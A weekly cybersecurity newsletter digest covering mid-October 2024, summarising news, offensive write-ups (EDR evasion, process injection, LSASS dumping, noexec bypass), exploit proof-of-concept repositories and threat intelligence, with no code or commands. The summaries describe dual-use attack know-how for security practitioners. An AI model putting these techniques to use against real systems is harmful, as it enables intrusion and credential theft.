Last Week in Security - 2024-10-21

We're Hiring!
Immediate Open Positions:
Maryland Applicants:
We have openings for a Cryptologic Computer Scientist, Cyber Operator Developer Analyst, Ethical Hacker, Information Assurance Specialist, Information Systems Security Officer, Jr. Offensive Cyber Operator, Red/Blue Team Engineer, Senior Web Application Penetration Tester, Systems Engineer, Data Scientist, HPC Software Engineer, Information Systems Security Engineer, and Reverse Engineer.
Virginia Applicants:
Available opportunities: DevSecOps Engineer and Red Team Operator - Senior.
For more open positions visit: https://www.sixgen.io/careers
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2024-10-14 to 2024-10-21.
News
How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends - Mandiant analyzed 138 vulnerabilities from 2023 and found that the majority were exploited as zero-days, with a growing use of zero-days over time. The average time-to-exploit (TTE) dropped significantly in 2023, with exploits happening quickly after patches were released. The analysis also looked at how exploitation timelines were influenced by factors like exploit availability and difficulty. The data showed that threat actors are continuing to target both zero-days and n-days, with the expectation of quicker exploitation timelines across a larger range of targets in the future.
Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations - Iranian cyber actors have been using brute force and credential access techniques to compromise critical infrastructure organizations, including sectors like healthcare, government, and energy. They aim to obtain credentials and network information to sell to cybercriminals, enabling them to access the organizations. The actors have been using methods like password spraying and MFA 'push bombing' since October 2023, as well as tools like VPN services and RDP for lateral movement.
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach - A 33-year-old man from Brazil, known as "USDoD" and a prolific cybercriminal, was arrested by Brazilian authorities for breaching the FBI Infragard program and leaking information. USDoD was also behind a breach at the consumer data broker National Public Data, leading to the leak of Social Security numbers of a significant portion of the U.S. population. USDoD admitted stealing the data but claimed not to be involved in leaking or selling it. The FBI declined to comment on USDoD's arrest, and USDoD had expressed plans to retire from cybercrime before continuing to post exploit code online.
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now - The U.S. and UK governments issued a joint advisory warning of Russian state-sponsored cyber threats, specifically from APT 29, responsible for the SolarWinds hack. GreyNoise detects that nine of the 12 vulnerabilities tracked in the advisory are actively being probed by attackers.
Capture the (red) flag: An inside look into China’s hacking contest ecosystem - The Atlantic Council wrote a detailed examination of China’s hacking contest ecosystem. It explores the role these contests play in fostering cybersecurity talent and innovation while also providing insight into how vulnerabilities discovered in these events are used for both defense and offense. The report highlights China's integration of such contests with state-sponsored cyber activities, illustrating their importance to the nation's cyber capabilities and strategies.
Techniques and Write-ups
Introducing Early Cascade Injection: From Windows Process Creation to Stealthy Injection - In this blog post, Early Cascade Injection is introduced as a novel process injection technique that targets the user-mode part of Windows process creation. This technique combines elements of Early Bird APC Injection and EDR-Preloading and aims to be effective against top-tier EDRs. The blog also delves into the internals of Windows process creation, Early Bird APC Injection, EDR-Preloading, and how Early Cascade Injection interacts with them. The post outlines the process of Windows process creation, the loading mechanism and timing of EDR user-mode detection measures, and how Early Cascade Injection bypasses EDR detection effectively.
Bypass YARA Rule f0b627fc for CobaltStrike to Evade EDRs - The blog post explains how to bypass the YARA rule f0b627fc targeting Cobalt Strike's signature shellcode by replacing key bytes with alternative shellcode and randomizing the shellcode with NOP instructions to evade EDR detection. By altering the instruction and using alternative shellcode sequences, it becomes harder for static analysis tools to detect the modified shellcode. The post also provides a script for implementing the bypass and includes key considerations for implementing shellcode alternatives. Additionally, the post mentions a shellcode loader called Indirect Waffles that leverages advanced techniques to evade EDR detection and enhance payload delivery.
I Know Which Device You Used Last Summer: Fingerprinting WhatsApp Users’ Devices - Security researchers found that Meta's WhatsApp is leaking information about users' device setups, including the number and types of devices used. This can provide valuable information to potential attackers for reconnaissance purposes. By analyzing message IDs, attackers can also determine the operating systems of users' devices, allowing for targeted attacks. Despite reporting the issue to Meta, the company has not responded, leading the researchers to make the information public.
Beyond the good ol' LaunchAgents - 35 - Persist through the NVRAM - The 'apple-trusted-trampoline' - This blog post discusses a unique persistence technique for macOS called 'apple-trusted-trampoline' that involves setting a binary in NVRAM to execute upon system boot. The technique can only be implemented when System Integrity Protection (SIP) is disabled. The author found the method interesting but largely impractical due to the limitations and dependencies on SIP status. The blog provides in-depth details on how to set up and execute the 'apple-trusted-trampoline' persistence method.
CloudGoat: New Scenario and Walkthrough (sns_secrets) - Rhino Security Labs has released a new scenario and walkthrough for CloudGoat, a platform for cloud security challenges. The scenario, SNS Secrets, involves enumerating IAM permissions, discovering SNS topics, and accessing API Gateways. The walkthrough includes instructions for configuring access keys in the AWS CLI, performing IAM role enumeration using the AWS CLI and Pacu, and identifying SNS topics using Pacu. By following these steps, users can gain a deeper understanding of AWS misconfigurations and enhance their AWS penetration testing skills.
Let’s Clone a Cloner - Part 2: You Have No Power Here - The article discusses the hardware security assessment of a long-range RFID badge cloner that is being built. The author explores potential power-related issues affecting the range of the device, testing different battery configurations to optimize power supply. The author ultimately finds success with a more powerful battery pack, achieving a significant improvement in the range of the device. The article concludes with plans for future modifications to the device in part 3 of the series.
Fortinet FortiGate CVE-2024-23113 - A Super Complex Vulnerability In A Super Secure Appliance In 2024 - A vulnerability, CVE-2024-23113, was discovered in Fortinet's FortiGate devices, affecting all currently-maintained branches. The vulnerability allowed for remote code execution and was exploited in the wild. Researchers at watchTowr analyzed and reproduced the vulnerability, finding that exploiting it was more complex than expected, but still possible with the right approach. They also discovered that different versions of FortiGate devices had varying levels of vulnerability, with some requiring a trusted certificate for exploitation.
DLL Sideloading - This blog discusses the concept of DLL Sideloading as a technique to execute custom malicious code from legitimate Windows binaries, providing details on how to detect vulnerabilities and exploit the technique. It also explains the process of conducting DLL Proxying for more evasive attacks and provides a practical example of weaponizing Sideloading for C2 payload execution by downloading and executing a malicious DLL in the target system.
Vulnerabilities of Realtek SD card reader driver, part 1 - The vulnerabilities in the Realtek SD card reader driver, RtsPer.sys, allow non-privileged users to leak kernel memory, write to arbitrary kernel memory, and read and write physical memory from user mode. These vulnerabilities have been present for years, affecting laptops from various OEMs, including Dell and Lenovo. Realtek released fixes for some vulnerabilities in April 2022, with the final fix for all vulnerabilities being released in July or August, in version 10.0.26100.21374 or higher. The second part of the blog post will delve into accessing physical memory via DMA and discuss the disclosure timeline and tools used in the research.
Using Offensive .NET to Enumerate and Exploit Active Directory Environments - This blog post discusses using Offensive .NET to Enumerate and Exploit Active Directory Environments. The author explores how .NET Framework is the most optimal platform for creating tools for offensive operations on Active Directory environments due to its compatibility and built-in methods. The post provides examples of using LDAP enumeration, enumerating Domain Controllers, and mapping trust relationships between domains. Additionally, it covers DACL-focused exploitation techniques such as writing to msDs-AllowedToActOnBehalfOfOtherIdentity and servicePrincipalName, adding users to groups, and changing user passwords. The post emphasizes the ease and effectiveness of using .NET for offensive Active Directory interactions.
Bypassing noexec and executing arbitrary binaries - The article introduces a method to bypass the "noexec" restriction on Linux systems and execute arbitrary binaries using only Bash, syscall(2) calls, and core utilities. The process involves creating a memory-backed file descriptor and modifying the process image to execute the downloaded binary without touching the file system. The trick can be useful in scenarios where users do not have permission to write or execute files on the host. Different variants of the trick using Perl and PHP are also discussed, with potential limitations in certain environments such as SELinux or GRSecurity.
Spec-tac-ula Deserialization: Deploying Specula with .NET - The article discusses how .NET deserialization can be used for Red Team operations, specifically with the tool Specula. It outlines the process of finding a vulnerable application and creating a payload to exploit it. The article also demonstrates how to backdoor a workstation with Specula by setting registry keys using .NET code, and explains how a gadget chain works to reflectively load an assembly into memory and execute its default constructor.
Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism - Unit 42 researchers have identified weaknesses in the Gatekeeper security mechanism on macOS, which is designed to ensure only trusted software runs on the system. Certain third-party utilities and applications do not enforce the necessary quarantine attribute, potentially allowing for Gatekeeper bypasses and leaving users vulnerable to malicious content. Apple expects developers to comply with security guidelines, but some built-in utilities and third-party applications do not, creating potential security risks.
SAS CTF and the many ways to persist a kernel shellcode on Windows 7 - The blog post discusses a kernel shellcode persistence technique used in APT attacks, focusing on a challenge from the SAS CTF competition. The technique involves exploiting a flaw in Windows 7/Windows Server 2008 R2 that allows hidden kernel shellcode in the system registry to be executed during system boot. The post provides technical details on the flaw, the challenges faced in the competition, and the steps taken to analyze and decrypt the shellcode.
Practical Examples of URL Hunting Queries - Part 1 - This guide provides practical examples of URL hunting queries, including searching for specific domain names, file URLs, and IP addresses without domains. It also includes techniques for decoding malware scripts and tracking malicious infrastructure through DNS records, with a focus on defeating obfuscation and identifying APT domains.
CVE-2024-45844: Privilege escalation in F5 BIG-IP - CVE-2024-45844 is a privilege escalation vulnerability discovered in F5 BIG-IP appliances, allowing attackers to escalate their privileges by sending unauthorized MCP messages. The vulnerability was acknowledged by F5 and patched in released versions. By exploiting this issue, attackers could create new root-level accounts, change user roles, or modify passwords. F5 recommended limiting CLI access to trusted users and implementing a zero-trust model in their newer architecture to prevent such vulnerabilities.
Over 7 Million WooCommerce Sites Affected by a Simple HTML Injection: CVE-2024–9944 Analysis - A security researcher discovered a HTML injection vulnerability in WooCommerce that affected over 7 million sites. The vulnerability allowed malicious users to inject harmful HTML into the "Order Notes" field, potentially leading to phishing attacks or social engineering tactics. The issue was patched in WooCommerce version 9.1.0, and users are advised to update to the latest version to mitigate the vulnerability. The researcher reported the bug to Automattic via HackerOne, and it was assigned a CVE number in October 2024.
Escaping the Chrome Sandbox Through DevTools - In this blog post, the author describes finding vulnerabilities in the Chromium web browser, specifically CVE-2024-6778 and CVE-2024-5836, which allowed for a sandbox escape from a browser extension through user interaction. The bugs enabled a malicious Chrome extension to run shell commands on a PC, potentially leading to the installation of malware. By exploiting a feature in the Chrome devtools API and a race condition, the author was able to create a reliable exploit chain that triggered a sandbox escape, resulting in a $20,000 reward from Google.
Spoofing Internal Packets for Multihomed Linux Devices - Anvil Secure has discovered a vulnerability in multihomed Linux devices that allows for the spoofing and injection of packets into internal communication streams via an external interface, even when IP Forwarding is disabled. This vulnerability can be exploited by an attacker with a foothold on an adjacent network. The white paper authored by Anvil Secure outlines this issue and provides exploit scenarios, recommending the use of anti-spoofing firewall rules to mitigate the risk.
Hacking Android Games - The blog post discusses hacking Android games, specifically focusing on Unity games and the process of reverse engineering to extract the game's source code using tools like il2cppdumper and Dnspy. It also covers dynamic hacking methods using Cheat Engine and static analysis with Dnspy to manipulate game values for advantages. The post highlights using Frida for dynamic analysis and tracing classes to hack game functions like increasing money, showcasing the process with screenshots and code examples.
Reverse engineering a dead MOTU audio interface to detect its failure - The author purchased a malfunctioning MOTU Ultralite AVB audio interface and attempted to diagnose and repair it without access to service manuals or technical support. By reverse engineering the device, they discovered that a faulty integrated circuit responsible for communicating over the I2C bus was causing the issue. After replacing the component, the audio interface began functioning properly again. This experience provided the author with valuable insights into the inner workings of the device and the process of reverse engineering hardware.
Finding Vulnerability Variants at Scale - A security audit revealed a vulnerability in a file format that had variants in popular projects like Chromium, Electron, and WINE. The vulnerability, found in the JPEG decompression process, involved an integer overflow and a heap buffer overflow. Automated and manual processes were used to identify these vulnerabilities in multiple repositories, resulting in the discovery of over 40 projects with the vulnerability. The findings have been reported to vendors for mitigation, and the methodology is shared to help other security researchers enhance their audits and contribute to a more secure software ecosystem.
Linux Persistence Mechanisms and How to Find Them - Linux persistence mechanisms are used by attackers to maintain access to compromised systems after reboots or updates. Methods include modifying systemd services, using cron jobs, utilizing malicious packages, modifying user passwords, and more. Detection tools like auditd and Sysmon can help track and respond to suspicious activities. Understanding these persistence techniques is crucial for defending against persistent threats on Linux systems.
Popping Android Vulnerabilities From Notification to WebView XSS - This article discusses the vulnerabilities in Android apps that can be exploited from notifications to WebView XSS. The author highlights the importance of understanding Android app vulnerabilities beyond just bypassing root detection or SSL pinning. They provide a detailed example of exploiting a WebView through a maliciously crafted intent, emphasizing the need for proper validation of external sources and the use of PendingIntent for restricted access. The article also mentions the use of a dynamic ClassLoader in Android to create objects that the app will accept as legitimate, bypassing type checks.
Unmasking CVE-2024-38178: The Silent Threat of Windows Scripting Engine - CVE-2024-38178 is a type confusion vulnerability in the Windows Scripting Engine that allows remote code execution on targeted Windows systems. The vulnerability was exploited by a North Korea-based threat group, APT37, in June 2024. The exploit process involves bypassing a previous patch (CVE-2022-41128) by manipulating variables initialized with arithmetic conversion operators.
Abusing AD-DACL : Generic ALL Permissions - This post explores the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Directory environments, allowing for unrestricted access to user attributes. Attack vectors such as Kerberoasting, password resets, and account manipulation are discussed, with a focus on detection and mitigation. The post provides detailed lab setups, methods of exploitation, and tools like Bloodhound, Net RPC, and Powerview to demonstrate how attackers can abuse these permissions to gain domain dominance and compromise Active Directory systems.
Shellcode: Obfuscation with Permutations - The post discusses the use of permutations for obfuscation in shellcode. It covers topics like Linear Congruential Generators, Inversive Congruential Generators, Affine Transformations, Modular Multiplication, Modular Involutions, and the Lehmer Random Number Generator. The post also explores the application of these concepts in cryptography, hash functions, and ciphers. Additionally, it provides code examples and explanations of how these techniques can be implemented in programming languages like C and Python.
BannleEye - Banning arbitrary players using BE - The post discusses a release of a tool called BannleEye, which allows users to permanently ban any player in games using the BattleEye anti-cheat system. It provides a detailed explanation of how the tool works and how players can exploit it to ban arbitrary users. The post also discusses potential vulnerabilities in the BattleEye system and suggests ways to patch them.
Cross-Process Spectre Exploitation - The author developed a cross-process Spectre attack exploiting an incomplete Indirect Branch Prediction Barrier (IBPB) in Intel processors, discovering a bug that retains return target predictions across IBPBs. The attack focuses on exploiting shared branch prediction state across processes running on the same core. The author hopes to raise awareness among software authors to enable IBPB for protection against such attacks. The attack involves training a victim process in order to leak secret information using a ROP-gadget chain and exploiting noisy results to deduce the leaked information. The author also discusses derandomizing ASLR to reveal the victim's address space layout.
I hate you COM – Pitfalls of COM object activation - The author describes their struggles with COM object activation and compatibility issues with the CLR in the context of dotnet unmanaged-api. They discuss how the issue was resolved by loading the correct version of mscordbi.dll and using the correct APIs to instantiate the COM class. The post also provides a solution in the form of C++ code to manually activate a COM class. Ultimately, the author was able to successfully invoke the desired interface methods after addressing the compatibility issue.
Exception Junction - Where All Exceptions Meet Their Handler - The blog "Exception Junction - Where All Exceptions Meet Their Handler" talks about the challenges faced while debugging and researching new features for Brute Ratel. It delves into exception handlers in Windows, focusing on Vectored Exceptions (VEH) and their differences with Structured Exception Handling (SEH). The author discusses their research into Windows internals and the process of creating a custom Vectored Exception Handler. The blog also provides insights into handling exceptions in Windows, exploring the intricacies of VEH and the challenges faced in dealing with the 'LdrpVectorHandlerList' structure. The author concludes by highlighting the social responsibility of detection engineers and provides a detection rule for identifying anomalies related to the 'LdrpVectorHandlerList' structure.
Call and Register — Relay Attack on WinReg RPC Client - This blog discusses the "WinReg Relay" vulnerability, which impacts Windows systems through the misuse of the Windows Registry. This flaw allows attackers to intercept sensitive data and potentially gain unauthorized access to systems by exploiting registry permissions. The post highlights the vulnerability's mechanism, exploitation methods, and potential mitigations.
Tools and Exploits
Ghost - Ghost is a shellcode loader project designed to bypass detection capabilities typically implemented by EDRs. It uses fiber threads to avoid kernel callbacks, stack spoofing techniques to evade stack unwinding, and a shellcode hiding technique using random cryptographic data. Other evasion techniques include suspended processes, stopping ETW, and custom API hashing. Ghost relies on understanding how the beacon sleeps and can be customized for different C2 beacons.
Sharelord - The GitHub repository "Sharelord" is a .NET assembly project that creates network shares, sets ACE entries for directories, sets share permissions, and deletes shares. It is a learning project for C# that demonstrates how to interact with Win32 APIs. The project includes a command-line tool for managing Windows shared folders and their permissions, with commands like creating shared folders, setting file system permissions, setting share-level permissions, and deleting shares.
Proxll - Proxll is a tool designed to simplify the generation of proxy DLLs and address common conflicts related to windows.h. It involves steps such as locating a DLL opportunity, compiling ProxllGen.exe, generating a proxy DLL template, and compiling the proxy DLL. The tool helps automate the process of creating proxy DLLs to prevent crashes and execute malicious code safely. By separating functions with windows.h dependencies from the exported functions, Proxll resolves conflicts and simplifies the DLL generation process.
memexec - The GitHub repository "hackerschoice/memexec" provides a method for circumventing the "noexec" mount flag on Linux systems to execute arbitrary binaries without using ptrace or process injection. The scripts included in the repository allow for executing binaries that do not need the executable permission and can be loaded from a noexec-partition or directly from the Internet. This technique works as a non-root user and can be used to bypass restrictions such as PHP's "exec" restrictions.
CVE-2024-35250 - The GitHub repository "varwara/CVE-2024-35250" contains a Proof of Concept (PoC) for the Untrusted Pointer Dereference vulnerability in the ks.sys driver.
ghostport - Ghostport is a high-performance port spoofing tool built in Rust that confuses port scanners with dynamic service emulation across all ports. It features customizable signatures, efficient asynchronous handling, and easy traffic redirection. Users can easily run Ghostport with command-line interface or through cargo, and can redirect all incoming TCP traffic to Ghostport using iptables.
Recon Royale - Recon Royale is a competitive platform where participants submit subdomains for a target domain to earn points. The system uses CloudFlare's DoH service to process and validate subdomains, rewarding points for valid submissions and deducting points for invalid ones. Participants can only submit once per round, with rounds ending daily at midnight UTC+2. The top participant in the leaderboard is awarded a crown, and targets are selected from public bug bounty programs.
Argus - Argus is an all-in-one, Python-powered toolkit designed for information gathering and reconnaissance, featuring a user-friendly interface and powerful modules. It can be used for research, security assessments with proper authorization, or exploring network infrastructures. The toolkit offers tools for network and infrastructure, web application analysis, and security and threat intelligence, with modules like DNS over HTTPS, Broken Links Detection, and Data Leak Detection. Users can launch Argus from the command line and follow prompts to gather information efficiently.
CVE-2024-30090 - LPE PoC - This GitHub repository contains a Proof of Concept (PoC) for a Local Privilege Escalation (LPE) vulnerability identified as CVE-2024-30090. The PoC demonstrates how an attacker can exploit this vulnerability to escalate privileges on a Windows system.
LsassReflectDumping - The GitHub repository Offensive-Panda/LsassReflectDumping contains a tool that clones the lsass.exe process using the Process Forking technique and the RtlCreateProcessReflection API. Once the clone is created, it generates a memory dump of the cloned process using MINIDUMP_CALLBACK_INFORMATION callbacks. The tool can be executed to create a dump file, which can then be parsed offline using tools like Mimikatz or Pypykatz to extract logon passwords.
vulnhuntr - Vulnhuntr is a tool that uses Large Language Models (LLMs) and static code analysis to autonomously discover vulnerabilities in Python codebases. It automatically analyzes code call chains starting from user input to server output to detect complex security vulnerabilities such as remote code execution, cross-site scripting, and SQL injection. The tool generates detailed reports with vulnerability assessments, context functions and class references, confidence scores, and logs of the analysis process.
CVE-2024-9254 - The GitHub repository contains an exploit for a vulnerability in Grafana that allows for arbitrary file-read (CVE-2024-9264). The exploit demonstrates the exploitation using an authenticated user to perform a DuckDB SQL query and read arbitrary files on the filesystem. Grafana released special versions to fix this vulnerability by removing the SQL Expressions feature. The exploitability of this vulnerability depends on whether the DuckDB binary is installed on the Grafana server, and patching and removing DuckDB can reduce the likelihood of successful exploitation.
Threat Intel and Defense
From QR to compromise: The growing “quishing” threat - Sophos X-Ops team discovered a new phishing technique called "quishing" where attackers use QR codes in PDF email attachments to steal corporate credentials from mobile devices. The attackers send emails with QR codes that redirect to phishing pages mimicking Microsoft365 login screens. The attackers have been using sophisticated tactics, such as embedding logos and graphics in QR codes, to make the attacks more convincing. Security measures like Intercept X for Mobile and Microsoft Entra ID Protection can help protect against these types of attacks. Employee training and prompt reporting of suspicious emails are also crucial in preventing successful phishing attacks.
At Nearly $1 Billion Global Impact, the Best Cloud Security Couldn’t Stop This Hybrid Attack Path. Takeaway: Map and Close Viable Attack Paths Before Breaches Begin. - The blog discusses the significant impact of hybrid attack paths, as seen in breaches like SolarWinds and Capital One, that crossed security domains despite the best cloud security measures.
Beyond the Surface: the evolution and expansion of the SideWinder APT group - The SideWinder APT group, also known as T-APT-04 or RattleSnake, is a prolific threat group targeting military and government entities in South and Southeast Asia. They have recently expanded their activities to the Middle East and Africa, using a new post-exploitation toolkit called "StealerBot" for espionage activities. The group utilizes various infection vectors, such as spear-phishing emails with malicious attachments and LNK files, to deliver their payloads. Their operations have been observed targeting a wide range of sectors and countries, with a high level of sophistication in their techniques.
Active Cyber Defence – Taking back control - In this article, JUMPSEC discusses the importance of Active Cyber Defence, which involves proactively engaging, disrupting, and countering cyber threats. They share a success story of catching an attacker using a honeypot server, showcasing the effectiveness of such proactive measures. The article emphasizes the need for organizations to focus on specific threats they face and tailor their security measures accordingly. It also provides practical tips on implementing Cyber Deception techniques to strengthen cybersecurity defenses.
BEC-ware the phish (part 1). Investigating incidents in M365 - Part 1 of the "BEC-ware the phish" series discusses investigating incidents in M365 and the importance of key artefacts for telemetry in cases of Business Email Compromise (BEC). It emphasizes the need to verify and enable Unified Audit Logging, use Purview content search, and leverage Advanced Hunting tables for analysis. The post also covers common investigation questions, artefacts in M365 (including default and free-to-enable options), and the importance of host-based artefacts in filling gaps in investigations. It concludes with recommendations for effective investigation and remediation of email-based threats in M365.
DCSync Attack Explained - A DCSync attack is a technique used by threat actors to impersonate a domain controller and steal credentials from an Active Directory (AD) database. The attack can bypass traditional auditing and detection methods and requires high-level permissions to execute. Defenders can use tools like Semperis DSP Intelligence to detect and prevent DCSync attacks, and should implement a tiered access model to reduce the risk of exposure.
How to inspect TLS encrypted traffic - The article discusses three methods for inspecting TLS encrypted traffic: RSA private key decryption, TLS key log decryption, and TLS inspection proxy. RSA private key decryption allows the inspection of SSL and TLS traffic using the server's private RSA key, but is limited by security concerns. TLS key log decryption requires access to encryption key material to decrypt traffic in Wireshark. TLS inspection proxy acts as a Man-in-the-Middle to intercept and decrypt TLS traffic for inspection, with the drawback of requiring clients to trust the root Certificate Authority certificate. Each method has its own advantages and limitations depending on the specific challenge at hand.
Unpacking Snake Keylogger - This blog is about unpacking a Snake Keylogger malware sample for malware analysis. The malware is described as an Infostealer, Keylogger, and Clipboard-Hijacker that first appeared in 2019. The unpacking process involves decompiling the .NET assembly, decrypting the payload, examining process injections and obfuscation techniques, and analyzing the final payload. The final payload is identified as the Snake Keylogger malware family, which can steal data and send it via the Telegram API, FTP, or SMTP. This blog also discusses decrypting config variables and accessing the Telegram bot associated with the malware.
UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants - UAT-5647, a Russian speaking threat actor, has been targeting Ukrainian and Polish entities with RomCom malware variants since late 2023. The attacks involve multiple malware families including RustClaw, MeltingClaw, DustyHammock, and ShadyHammock. The threat actor has been focusing on long-term access and data exfiltration for espionage motives, with potential plans to deploy ransomware in the future. The infection chain consists of spear-phishing emails delivering malware downloaders and backdoors, leading to post-compromise activities such as lateral movement, system discovery, and data exfiltration.
Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data - The article discusses a Golang ransomware sample that abuses Amazon S3 to exfiltrate victim files and masquerades as LockBit ransomware. It highlights the discovery of hard-coded AWS credentials in the samples, resulting in AWS account suspensions. The blog also emphasizes the importance of monitoring cloud resources for malicious activities and the need for vigilant security measures such as proactive threat detection and response capabilities like XDR. It concludes with a statement from AWS confirming the suspension of the reported AWS access keys and account due to policy violations.
Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions - Trend Micro's Threat Hunting Team has identified a red team tool called EDRSilencer, which threat actors are using to block EDR traffic and hide malicious activity. The tool disrupts the transmission of telemetry and alerts to EDR management consoles, making it difficult to detect and remove malware. By blocking network communication for EDR processes, EDRSilencer can evade detection and allow malicious activities to go undetected, posing a significant threat to organizations.
Call stack spoofing explained using APT41 malware - Call stack spoofing is a technique used to hide suspicious activity from security software by constructing a fake call stack that mimics a legitimate one. A malware called APT41 implemented this technique to trick Antivirus and EDR software. The malware decrypts relevant strings at runtime using AES encryption and retrieves handles to kernelbase.dll to execute malicious code. The process involves manipulating memory addresses and executing JOP gadgets to redirect execution flow and evade detection.
Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) - Trustwave's 2024 financial services threat reports reveal alarming trends in insider threats and phishing-as-a-service. The article explores the Meow attack, where hackers targeted unsecured databases like Elasticsearch and MongoDB to destroy data. The attack was automated and exploited misconfigurations such as open ports and default credentials. A simulation of the Meow attack using Docker and a Python script demonstrates the ease at which such attacks can be carried out. Despite advancements in security, misconfigured databases still pose a significant risk, emphasizing the importance of addressing vulnerabilities promptly to prevent data breaches.
Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia - The article analyzes the tools and techniques used by the Crypt Ghouls hacktivists, who have targeted Russian businesses and government agencies with ransomware. The group uses a variety of tools, including Mimikatz, XenAllPasswordPro, AnyDesk, and LockBit 3.0, to harvest login credentials, conduct network reconnaissance, and spread ransomware. There are similarities between the tactics, techniques, and procedures used by Crypt Ghouls and other hacker groups targeting Russia, indicating possible collaboration or resource sharing among different groups. The analysis highlights the challenges in identifying specific malicious actors behind the wave of attacks on Russian organizations.
Detection of “EDRSilencer” - The article discusses the detection of a tool called "EDRSilencer" that blocks Endpoint Detection and Response (EDR) agents from reporting security events to the server. The tool operates by maintaining a list of EDR-related process names and blocking outbound traffic for any detected EDR processes using Windows Filtering Platform (WFP). It also introduces the concept of custom WFP providers to manage the filters. The article provides instructions on how to detect the activity of EDRSilencer and enable auditing for this type of activity.
EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs - The EIW — ESET Israel Wiper — has been used in active attacks targeting Israeli organizations. The attacks were carried out through phishing emails that appeared to come from ESET Israel, containing a malicious setup.exe file. The malware is designed to wipe files and appears to be linked to Iran-based threat groups. ESET has released an antivirus signature to detect related activity.
Microsoft Defender XDR's Deception Technology - Microsoft Defender XDR's Deception Technology allows users to enable a deception capability that creates decoy accounts and hosts to lure attackers. These decoy accounts can be identified through PowerShell logs when they log in locally to a network. By analyzing the executed PowerShell code, users can confirm the presence of decoy accounts and protect their network from potential threats.
New macOS vulnerability, “HM Surf”, could lead to unauthorized data access - Microsoft Threat Intelligence uncovered a macOS vulnerability referred to as "HM Surf" that allows attackers to bypass the operating system's Transparency, Consent, and Control (TCC) technology, granting unauthorized access to a user's protected data. The vulnerability involves modifying configuration files in the Safari browser directory to access a user's data without consent. Apple released a fix for this vulnerability, now identified as CVE-2024-44133. Microsoft encourages macOS users to apply security updates to protect against potential exploitation. Microsoft Defender for Endpoint detects and blocks exploitation of this vulnerability, providing protection against threats like Adload that may exploit the vulnerability.
bedevil: Dynamic Linker Patching - The blog post discusses bedevil, an LD_PRELOAD rootkit that runs in userland and targets VMware vCenter servers. The rootkit includes a feature called Dynamic Linker Patching, which allows it to patch the dynamic linker libraries on the system. This technique provides attackers with stealth advantages while presenting challenges for defenders trying to detect intrusions. The post delves into the patching technique used by the bedevil rootkit, exploring how it works and the implications for both red and blue teams in terms of detection and mitigation strategies.
Tricks and Treats: GHOSTPULSE’s new pixel- level deception - The GHOSTPULSE malware has evolved to embed malicious data directly within pixel structures, making it harder to detect and requiring new analysis and detection techniques. Recent campaigns involve creative social engineering tactics to trick victims into executing malicious commands. Elastic Security Labs has updated its YARA rules and configuration extractor tool to detect and analyze both old and new versions of GHOSTPULSE. The malware now retrieves its configuration and payload by parsing pixels of an image, a significant change from its earlier method of hiding payloads in PNG files.
IcePeony with the '996' work culture - IcePeony is an unknown China-nexus APT group that has been active since at least 2023, targeting government agencies, academic institutions, and political organizations in countries like India, Vietnam, and Mauritius. They operate under harsh work conditions, potentially following the '996' work culture, with long working hours six days a week. They use a custom IIS malware called IceCache and have been expanding their targets over time. Their activities suggest they are working on behalf of China's national interests, possibly related to China's maritime strategy.
ClickFix tactic: The Phantom Meet - This post describes a cyberattack technique involving social engineering and malware deployment. Attackers use fake meeting invitations to trick targets into clicking malicious links, often bypassing common email security controls. This tactic is primarily used for credential theft or to gain initial access to systems.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
HijackLoader evolution: abusing genuine signing certificates - Recently, there has been an increase in the deployment of the "Lumma Stealer" malware through the "HijackLoader" exploit, with some samples being signed with genuine code-signing certificates. A detailed analysis of the deployment workflow, including a fake CAPTCHA campaign and DLL sideloading, was conducted. The blog post also highlights the evolution of the HijackLoader tactic, where signed malware samples evade traditional detection methods. Furthermore, the investigation led to the identification and revocation of multiple abused code-signing certificates, emphasizing the importance of implementing multiple detection tactics to protect against signed malware.
How I found a P2 Misrouting issue affecting all Google Cloud Load Balancers - The author discovered a P2 misrouting vulnerability affecting all Google Cloud Load Balancers connected to storage buckets, which could expose sensitive information and lead to potential attacks on thousands of websites. By sending unconventional HTTP requests, the author found that load balancers were disclosing bucket names, allowing for exploitation in unexpected ways. The issue was reported, triaged, and rewarded as a P2 severity issue, with a fix implemented in September 2024. The author highlights the importance of reverse proxy security and encourages further exploration of this often overlooked area in cybersecurity.
Should We Chat, Too? Security Analysis of WeChat’s MMTLS Encryption Protocol - The report analyzes the security and privacy properties of WeChat's MMTLS encryption protocol, finding weaknesses in the cryptography used. The analysis suggests using a standard encryption protocol like TLS or QUIC+TLS would be more secure and performant. Recommendations are made for application developers, Tencent and WeChat developers, high-risk users, security and privacy researchers, and operating systems. The report includes a disclosure to Tencent about the findings and their response. The core of WeChat's security protocol is mmtls encryption, while issues in the inner layer encryption are being addressed by switching to AES-GCM encryption.
Off the Fox Den Bookshelf: Security and Tech Books We Love - Bishop Fox has been named the Leader of the GigaOm Radar for the third year in a row. They offer a variety of offensive security solutions including Cosmos Attack Surface Management, Application Penetration Testing, and External Penetration Testing. They also provide resources such as eBooks, guides, and bulletins for cybersecurity professionals. Additionally, they offer partner programs and have expanded to Mexico. Their team has curated a list of recommended cybersecurity books for professionals at all levels.
The Black Team Ops honeypot - SpacialSec conducted a social experiment by creating a fake course called Black Team Ops, which generated a significant amount of interest and registrations. They used this opportunity to collect information on potential threat actors and created a honeypot for educational purposes. The team also used this experience to promote their CTIStream™ product for threat intelligence gathering. Additionally, the experiment highlighted the growing interest in criminal activities such as SIM swapping and the importance of cyber security awareness.
Comentarios